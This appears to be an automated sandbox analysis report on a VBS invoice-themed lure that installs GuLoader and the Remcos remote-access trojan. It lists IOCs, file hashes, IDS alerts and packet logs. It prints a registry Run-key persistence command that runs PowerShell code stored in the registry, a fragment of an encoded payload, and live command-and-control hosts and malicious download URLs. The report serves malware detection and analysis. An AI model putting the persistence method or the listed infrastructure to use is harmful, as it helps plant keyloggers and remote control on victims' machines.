• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
Time | Type | Description
08:16:59 | API Interceptor | 88x Sleep call for process: powershell.exe modified
08:18:15 | API Interceptor | 846006x Sleep call for process: msiexec.exe modified
13:17:42 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Sandsynliggrelsens %Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)
13:17:50 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Sandsynliggrelsens %Hexokinase% -windowstyle 1 $Jordbundssammenstnings=(gp -Path 'HKCU:\Software\Skulptureredes\').carlcorey;%Hexokinase% ($Jordbundssammenstnings)
Match | Associated Sample Name / URL | Detection | Threat Name | Context
172.67.155.139 | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader |
185.236.203.101 | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader |
 | rIMGTR657365756.bat | malicious | Remcos, GuLoader |
 | 17282393454a20ebb72846132bb7146ed4a1a58abc0a2fcca78c88bb5a73356856494e7ece637.dat-decoded.exe | malicious | Remcos |
 | na.rtf | malicious | Remcos |
 | DSpWOKW7zn.rtf | malicious | Remcos |
 | Formularz instrukcji p#U0142atno#U015bci Millennium.xls | malicious | Remcos |
 | SecuriteInfo.com.Exploit.CVE-2017-11882.123.31506.1346.rtf | malicious | Remcos |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
plieltd.top | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 172.67.155.139
 | rIMGTR657365756.bat | malicious | Remcos, GuLoader | 104.21.56.189
pelele.duckdns.org | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 185.236.203.101
 | rIMGTR657365756.bat | malicious | Remcos, GuLoader | 185.236.203.101
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | https://t.ly/N1B0D | malicious | Unknown | 172.65.251.78
 | RFQ 1307.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 188.114.96.3
 | https://library.wic.ac.uk/upload/~/app/step2.php?id=37602430 | malicious | Unknown | 104.17.25.14
 | https://library.wic.ac.uk/upload/~/app/step3.php?id=5384235 | malicious | Unknown | 104.17.25.14
 | file.exe | malicious | Unknown | 104.21.29.144
 | Message_2530136.eml | malicious | Unknown | 1.1.1.1
 | https://www.childkorea.or.kr/bbs/link.html?code=alarm&number=3064&url=https://form.jotform.com/242923371946059 | malicious | HTMLPhisher | 104.19.229.21
 | FACTURA RAGOZA.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
 | Purchase Order.exe | malicious | GuLoader, Snake Keylogger | 188.114.97.3
 | https://s3.us-east-2.amazonaws.com/revealedgceconomies/vdiq197yvi/ImgBurn_822881.exe? | malicious | Unknown | 104.26.5.9
M247GB | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 185.236.203.101
 | bin.i586.elf | malicious | Gafgyt, Mirai | 38.202.237.70
 | 1729445225fa0e5768d1d682409147d63519fc74f7a5fbd0985a9e3ffe794cd2fed7b2306d148.dat-decoded.exe | malicious | Remcos | 172.111.244.103
 | lsAXde4em3.exe | malicious | Quasar | 128.0.1.24
 | la.bot.sh4.elf | malicious | Unknown | 45.89.173.108
 | arm7.elf | malicious | Unknown | 38.202.225.93
 | JVxDWS9r3H.msi | malicious | Matanbuchus | 193.109.85.43
 | YM10RsQfhm.msi | malicious | Matanbuchus | 193.109.85.31
 | R7xCGuaxlx.exe | malicious | PureLog Stealer | 89.238.176.6
 | vYGwWQ2LHj.exe | malicious | Unknown | 89.238.176.6
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | RFQ 1307.scr.exe | malicious | Snake Keylogger, VIP Keylogger | 172.67.155.139
 | Anfrage fur Proforma-Lieferrechnung und Zahlungsbedingungen.vbs | malicious | GuLoader | 172.67.155.139
 | FACTURA RAGOZA.exe | malicious | GuLoader, Snake Keylogger | 172.67.155.139
 | Purchase Order.exe | malicious | GuLoader, Snake Keylogger | 172.67.155.139
 | Spedizione.vbs | malicious | Unknown | 172.67.155.139
 | FACTURA DE PAGO.exe | malicious | GuLoader, Snake Keylogger | 172.67.155.139
 | PAGO FRAS. AGOSTO 2024..exe | malicious | GuLoader, Snake Keylogger | 172.67.155.139
 | https://weiderergmbh-my.sharepoint.de/:o:/g/personal/s_kreuzer_luxapark_de/En8ihQEtXF1HtuEzkWTEmvQBXZUe8GC_guY4c0qSMi2Czg?e=5%3aJCIXIb&at=9 | malicious | Unknown | 172.67.155.139
 | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 172.67.155.139
 | Documenti di spedizione.bat.exe | malicious | AgentTesla, GuLoader | 172.67.155.139
37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Unknown | 172.67.155.139
 | FACTURA RAGOZA.exe | malicious | GuLoader, Snake Keylogger | 172.67.155.139
 | Spedizione.vbs | malicious | Unknown | 172.67.155.139
 | FACTURA DE PAGO.exe | malicious | GuLoader, Snake Keylogger | 172.67.155.139
 | PAGO FRAS. AGOSTO 2024..exe | malicious | GuLoader, Snake Keylogger | 172.67.155.139
 | rIMG465244247443GULFORDEROpmagasinering.cmd | malicious | Remcos, GuLoader | 172.67.155.139
 | 450707124374000811.exe | malicious | GuLoader | 172.67.155.139
 | 450707124374000811.exe | malicious | GuLoader | 172.67.155.139
 | 3507071243740008011.exe | malicious | GuLoader | 172.67.155.139
 | Unlock_Tool_2.3.1.exe | malicious | Vidar | 172.67.155.139
                                                              No context
                                                              Process:C:\Windows\SysWOW64\msiexec.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):222
                                                              Entropy (8bit):3.3500554881430897
                                                              Encrypted:false
                                                              SSDEEP:3:rhlKlM+Xl81Ul/NeDl5JWRal2Jl+7R0DAlBG4moojklovDl64oojklovDl6v:6lj8el/NU5YcIeeDAlS1gWA41gWAv
                                                              MD5:0ED8A551138E7759D61B00D87F8AE098
                                                              SHA1:60D73704D7C22341AE357FA9FC80D112F1205F76
                                                              SHA-256:08881EECD678E97ED1BF378599B20F00F81A48057359F8538C5664DAE6BCF245
                                                              SHA-512:9F7B46FF6FA581CD37874399047F1EA188331A95BE9CA2AACC8D6258289431AFFD7BF4CF9874779B137A80C2B41EADB4746FD1F1787B4F16F6F439FA34CD5E4F
                                                              Malicious:true
                                                              Yara Hits:
                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                              Preview:....[.2.0.2.4./.1.0./.2.1. .0.8.:.1.7.:.4.3. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):8003
                                                              Entropy (8bit):4.840877972214509
                                                              Encrypted:false
                                                              SSDEEP:192:Dxoe5HVsm5emd5VFn3eGOVpN6K3bkkjo5xgkjDt4iWN3yBGHVQ9smzdcU6CDQpOR:J1VoGIpN6KQkj2qkjh4iUx5Uib4J
                                                              MD5:106D01F562D751E62B702803895E93E0
                                                              SHA1:CBF19C2392BDFA8C2209F8534616CCA08EE01A92
                                                              SHA-256:6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
                                                              SHA-512:81249432A532959026E301781466650DFA1B282D05C33E27D0135C0B5FD0F54E0AEEADA412B7E461D95A25D43750F802DE3D6878EF0B3E4AB39CC982279F4872
                                                              Malicious:false
                                                              Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):64
                                                              Entropy (8bit):1.1940658735648508
                                                              Encrypted:false
                                                              SSDEEP:3:NlllulVmdtZ:NllUM
                                                              MD5:013016A37665E1E37F0A3576A8EC8324
                                                              SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                              SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                              SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                              Malicious:false
                                                              Preview:@...e................................................@..........
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):60
                                                              Entropy (8bit):4.038920595031593
                                                              Encrypted:false
                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                              Malicious:false
                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                              Category:dropped
                                                              Size (bytes):486712
                                                              Entropy (8bit):5.870051690785869
                                                              Encrypted:false
                                                              SSDEEP:12288:aJOLSAxyV8bmVrM3HYGFAdw0SfZxQvww+0Mv8FgfX:aJSr88Yo3bAdw3yPg
                                                              MD5:87FF833A255506114FAA969869E18546
                                                              SHA1:86316D90AF91A20BFFD5A586E7AE94BEFE65651D
                                                              SHA-256:47A1FFA66A690B0ADCF95F5A2141629E112EDE25F80DDA1ADEB4F846F2D14BEB
                                                              SHA-512:6C484170C56D52F1F1786C8EB18CCBEBB138C8A1F90B57C509C1E7D5A9FCF1BCCECD4E0754DF6836D9602651094C02C3C58D3C3D0D72B25451952A1DC8091509
                                                              Malicious:false
                                                              Preview:6wJK5XEBm7u11Q8AcQGb6wI2SQNcJATrAtcF6wI37Lm7gqercQGbcQGbgfEgxpdx6wI8eXEBm4Hxm0Qw2usCWbrrAolm6wLuOusCY2a6Rxr9j3EBm+sCNbNxAZtxAZsxynEBm+sC/n+JFAtxAZtxAZvR4usCwU9xAZuDwQRxAZvrAi5dgfkLHWsDfM1xAZvrAmSQi0QkBHEBm+sCZkCJw+sCF4ZxAZuBw1ckOwBxAZvrAl/GukzSWfRxAZtxAZuB6jSyTjLrAlPY6wKR4oHyGCALwnEBm3EBm3EBm+sCdcXrArdU6wI/tYsMEOsC6HZxAZuJDBPrAl4h6wIkNEJxAZvrAuIKgfqcGwUAddNxAZtxAZuJXCQMcQGb6wJJ6IHtAAMAAOsCd5NxAZuLVCQI6wLsg+sC1KKLfCQEcQGbcQGbietxAZtxAZuBw5wAAADrAjj9cQGbU+sC7sJxAZtqQOsClxPrAi2cievrApeQcQGbx4MAAQAAAAB+A+sCG99xAZuBwwABAADrAuENcQGbU+sCGVxxAZuJ63EBm3EBm4m7BAEAAHEBm+sC3sWBwwQBAADrAsS36wLc4lPrAlclcQGbav9xAZvrAjhOg8IFcQGbcQGbMfZxAZtxAZsxyesCFxbrAj1fixpxAZtxAZtBcQGb6wIWdTkcCnXzcQGb6wK8bEbrArs76wILIIB8Cvu4ddzrAiTQcQGbi0QK/OsC80FxAZsp8HEBm+sC9Xj/0nEBm+sCCLu6nBsFAHEBm+sCQZMxwHEBm+sCoCSLfCQMcQGbcQGbgTQHV6T2+OsCUvXrAhMag8AEcQGbcQGbOdB15HEBm3EBm4n76wJPxesCG+b/1+sCMH3rAgm7v6T2+Ff/fx3e6XdBrKbR+NZVg1s++Xc5IpkXS9ZV9SR4td803Ol3eahsZQ478X8d7g2QQiOcNXm+s4fVFpw+eabK9KYN80k9AJSze6j4+XwtovP4CCUHHKB2n57SbHIMkOD7
                                                              File type:ASCII text, with CRLF line terminators
                                                              Entropy (8bit):5.1874057721062155
                                                              TrID:
                                                              • Visual Basic Script (13500/0) 100.00%
                                                              File name:IMGRO Facturi nepl#U0103tite 56773567583658567835244234Bandido.vbs
                                                              File size:29'517 bytes
                                                              MD5:a8da570deac5f16a0050802c0da5d7dd
                                                              SHA1:9d8992e3770e41d8a431350e1cef73492dc240ea
                                                              SHA256:c51c0afd1207879df1f42ac10c7c0bca5397c6b461a6423dbe58b091dc659e6d
                                                              SHA512:7731d4d019eb8e3cfa5e2e5d5802e4033cf289134c15c3a237bcfd7559ab964265b82b825b65451a21703f441619081b9be46767923fb7f662aa12a86e997730
                                                              SSDEEP:384:XrCiU16HKM4O+pbHLipRBP1Mv4Uwz+3S0KLV5Zsk+PNngq:Xen6HspbH2xdoftaV5Ck4N7
                                                              TLSH:B7D24E080A213FFC581FB7B16BC5B0E096FA0892A5B5E12C37356624F8A6E4EDD34DD5
                                                              File Content Preview:Sub Evulge(Konvojtronbestigelser,Transiteranatoleallo,Filstrenggenman,Shelteunderskabe,Polleesammentrykni)..If Konvojtronbestigelser = cstr(2614147) Then ....Cirkusforestillinge41 = Space(69)....End If....while (Alkydmalingernesb<31)..Alkydmalingernesb =
                                                              Icon Hash:68d69b8f86ab9a86
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-21T14:17:40.495655+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.4 | 49744 | 172.67.155.139 | 443 | TCP
2024-10-21T14:17:44.971905+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49745 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:47.995395+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49746 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:51.087230+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49747 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:54.067087+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49748 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:57.062288+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49750 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:17:59.200136+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49751 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:02.562679+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49758 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:05.364964+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49769 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:08.447528+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49788 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:11.941565+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49806 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:15.470639+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49823 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:18.489328+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49843 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:20.996537+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49863 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:24.548551+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49874 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:28.144206+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49895 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:31.950214+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49914 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:34.176307+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49933 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:36.264503+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49945 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:38.555739+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49958 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:40.757396+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49971 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:43.466320+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49984 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:46.400379+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 49999 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:49.663580+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50011 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:52.877339+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50022 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:55.536726+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50034 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:18:58.130787+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50036 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:19:00.887989+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50037 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:19:03.667580+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50038 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:19:06.491923+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50039 | 185.236.203.101 | 51525 | TCP
2024-10-21T14:19:09.993139+0200 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.4 | 50040 | 185.236.203.101 | 51525 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 21, 2024 14:17:00.848578930 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:00.848625898 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:00.848695993 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:00.854650974 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:00.854671001 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:01.479129076 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:01.479470015 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:01.514213085 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:01.514252901 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:01.515240908 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:01.528755903 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:01.571361065 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.020411968 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.020469904 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.020536900 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.020597935 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.020602942 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.020636082 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.020797014 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.020848036 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.020848989 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.020853043 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.020875931 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.020894051 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.063898087 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.137079000 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.137152910 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.137430906 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.137460947 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.188764095 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.196083069 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.196218014 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.196254015 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.196295023 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.196329117 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.196393013 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.196393013 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.196425915 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.196486950 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.196846962 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.197202921 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.197244883 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.197258949 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.197269917 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.197307110 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.197309017 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.197323084 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.197361946 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.197371006 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.198069096 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.198106050 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.198116064 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.198123932 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.198156118 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.198160887 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.198170900 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.198214054 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.198221922 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.251349926 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.254086971 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.254143953 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
Oct 21, 2024 14:17:02.254267931 CEST | 49737 | 443 | 192.168.2.4 | 172.67.155.139
Oct 21, 2024 14:17:02.254272938 CEST | 443 | 49737 | 172.67.155.139 | 192.168.2.4
